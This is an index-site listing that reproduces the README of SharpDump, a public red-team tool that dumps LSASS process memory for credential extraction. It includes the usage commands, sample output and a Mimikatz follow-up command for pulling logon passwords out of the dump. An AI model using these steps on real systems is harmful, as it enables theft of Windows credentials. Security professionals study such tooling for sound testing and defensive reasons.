Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/ghostpack/sharpdump

SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.
https://github.com/ghostpack/sharpdump

Last synced: about 2 months ago
JSON representation

SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.

Host: GitHub
URL: https://github.com/ghostpack/sharpdump
Owner: GhostPack
License: other
Created: 2018-07-24T17:42:19.000Z (about 6 years ago)
Default Branch: master
Last Pushed: 2019-02-07T02:52:20.000Z (over 5 years ago)
Last Synced: 2024-07-31T14:17:12.890Z (about 2 months ago)
Language: C#
Size: 10.7 KB
Stars: 656
Watchers: 27
Forks: 130
Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

README

        # SharpDump

----

SharpDump is a C# port of [PowerSploit's Out-Minidump.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1) functionality. The [MiniDumpWriteDump](https://docs.microsoft.com/en-us/windows/desktop/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump) Win32 API call is used to create a minidump for the process ID specified (LSASS by default) to C:\Windows\Temp\debug.out, GZipStream is used to compress the dump to C:\Windows\Temp\debug.bin (.gz format), and the original minidump file is deleted.

[@harmj0y](https://twitter.com/harmj0y) is the primary author of this port.

SharpDump is licensed under the BSD 3-Clause license.

## Usage

Dump LSASS:

    C:\Temp>SharpDump.exe

    [*] Dumping lsass (808) to C:\WINDOWS\Temp\debug808.out

    [+] Dump successful!

    [*] Compressing C:\WINDOWS\Temp\debug808.out to C:\WINDOWS\Temp\debug808.bin gzip file

    [*] Deleting C:\WINDOWS\Temp\debug808.out

    [+] Dumping completed. Rename file to "debug808.gz" to decompress.

    [*] Operating System : Windows 10 Enterprise N

    [*] Architecture     : AMD64

    [*] Use "sekurlsa::minidump debug.out" "sekurlsa::logonPasswords full" on the same OS/arch

Dump a specific process ID:

    C:\Temp>SharpDump.exe 8700

    [*] Dumping notepad++ (8700) to C:\WINDOWS\Temp\debug8700.out

    [+] Dump successful!

    [*] Compressing C:\WINDOWS\Temp\debug8700.out to C:\WINDOWS\Temp\debug8700.bin gzip file

    [*] Deleting C:\WINDOWS\Temp\debug8700.out

    [+] Dumping completed. Rename file to "debug8700.gz" to decompress.

## Compile Instructions

We are not planning on releasing binaries for SharpDump, so you will have to compile yourself :)

SharpDump has been built against .NET 3.5 and is compatible with [Visual Studio 2015 Community Edition](https://go.microsoft.com/fwlink/?LinkId=532606&clcid=0x409). Simply open up the project .sln, choose "release", and build.